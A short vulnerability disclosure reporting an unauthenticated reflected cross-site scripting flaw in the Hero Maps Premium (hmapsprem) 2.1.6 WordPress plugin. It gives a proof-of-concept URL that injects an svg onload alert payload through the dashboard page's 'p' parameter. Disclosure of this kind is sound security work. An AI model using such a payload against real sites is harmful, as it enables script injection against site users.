The hmapsprem WordPress plugin was affected by an Unauthenticated Reflected Cross-Site Scripting (XSS) security vulnerability.
http://example.com/wp-content/plugins/hmapsprem/views/dashboard/index.php?p=/wp-content/plugins/hmapsprem/foo%22%3E%3Csvg//onload=%22alert(%27XSS%20in%20Hero%20Maps%20Premium%202.1.6%27)%22%3E